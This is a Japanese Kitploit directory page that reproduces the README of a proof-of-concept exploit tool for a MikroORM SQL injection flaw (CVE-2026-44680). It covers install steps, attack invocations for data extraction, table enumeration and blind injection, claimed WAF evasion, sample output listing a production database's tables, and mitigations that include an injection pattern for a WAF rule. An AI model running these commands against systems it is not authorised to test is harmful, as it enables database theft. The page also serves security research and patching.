Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
ペネトレーションテストフレームワーク脆弱性スキャナーコード分析エクスプロイトウェブセキュリティデータベースセキュリティ
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

CVE-2026-44680 の PoC ツール。MikroORM ≤7.0.13 に影響します。JSON パスインジェクションを悪用し、UNION ベースの攻撃によりデータベースの内容を抽出します。脆弱性検出、自動データ抽出、テーブル列挙、ブラインド注入サポートを備えています。Burp Suite 用のプロキシ統合と WAF 回避テクニックを含みます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11ヶ月前未レビュー

CVE-2026-44680 - MikroORM SQLインジェクションエクスプロイトフレームワーク

Python Version License Status CVSS

セキュリティ研究者向けプロフェッショナルなProof-of-Conceptツール


🔍 概要

CVE-2026-44680 は、Node.js向けの人気TypeScript ORMであるMikroORMに影響を及ぼす重大なSQLインジェクション脆弱性です。このエクスプロイトフレームワークは、セキュリティ研究者やペネトレーションテスターに、脆弱性を検出および悪用するためのプロフェッショナルなツールを提供します。

作者: Sudeepa Wanigarathna
バージョン: 1.0.0
分類: プロフェッショナルなセキュリティ研究ツール


🚨 脆弱性の詳細

属性値
CVE IDCVE-2026-44680
CVSSスコア7.6(高)
攻撃ベクトルネットワーク
攻撃の複雑さ低
必要な権限低

影響を受けるバージョン

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

根本原因

MikroORMは、JSON_EXTRACT クエリを構築する際に、実行時に制御されるJSONパスキーを適切にエスケープできません。攻撃者はJSONパスコンテキストから脱出し、任意のSQLコードを注入することができます。


✨ 機能


📦 インストール

前提条件

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

インストール手順

ステップ1: リポジトリのクローン

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

ステップ2: 依存関係のインストール

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

ステップ3: インストールの確認

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 クイックスタート

基本的な使用方法

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 使用ガイド

コマンドオプション

使用例

1. 完全なエクスプロイト

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. カスタムエンドポイント

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. プロキシ使用(Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. 詳細デバッグ

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. ブラインド注入

root@kitploit:~
python exploit.py -u http://target.com --blind

6. 検出のみ

root@kitploit:~
python exploit.py -u http://target.com --detect

7. データベース情報の抽出

root@kitploit:~
python exploit.py -u http://target.com --extract

8. テーブルの列挙

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 出力例

コンソール出力

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

生成されるファイル

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ 対策

緊急対策

1. MikroORMの更新

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. 入力検証

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. WAFルール

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. データベースの堅牢化

  • 最小権限の原則を適用する
  • データベースユーザーを分離する
  • クエリロギングを実装する
  • SQLインジェクション検出を有効にする

⚠️ 免責事項

重要: このツールは、許可されたセキュリティテストおよび教育目的のみで使用してください。

法的通知

  • ✅ 明示的な許可を得ることが必須 です。いかなるシステムをテストする前にも必ず許可を取得してください
  • ✅ 誤用による損害の責任はすべて利用者にあります
  • ✅ 倫理的に使用 し、脆弱性を責任を持って報告してください

倫理的使用ガイドライン

  1. 許可: システム所有者から書面による許可を取得すること
  2. 報告: 発見した内容を影響を受けるベンダーに責任を持って報告すること
  3. 機密性: パッチが適用されるまで脆弱性を公開しないこと
  4. 制限: 許可されたテストの範囲内に留まること

📄 ライセンス

このプロジェクトは MITライセンス の下でライセンスされています。

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 参考情報

  • CVE-2026-44680 の詳細
  • MikroORM セキュリティアドバイザリ
  • OWASP SQLインジェクション防止

セキュリティ研究コミュニティのために ❤️ を込めて作られました

バグを報告 • 機能をリクエスト • GitHubでスターを付ける

ツールをダウンロード
機能説明ステータス
脆弱性検出時間ベースおよびエラーベースの検出✅
データベース抽出バージョン、データベース、ユーザー、ホスト名✅
テーブル列挙全テーブルの自動発見✅
UNIONベースの注入UNION SELECTによるデータ抽出✅
ブラインド注入ブールベースの文字抽出✅
プロキシサポートBurp Suite / インターセプトプロキシ✅
レポート生成プロフェッショナルなTXTレポート✅
WAF回避高度な難読化技術✅
フラグ説明デフォルト
-u, --urlターゲットURL(必須)-
-e, --endpointAPIエンドポイント/api/users/search
-p, --proxyHTTPプロキシNone
-v, --verbose詳細出力False
--detect脆弱性の検出のみ実行False
--extractデータベース情報の抽出False
--enumerateテーブルの列挙False
--blindブラインド注入モードFalse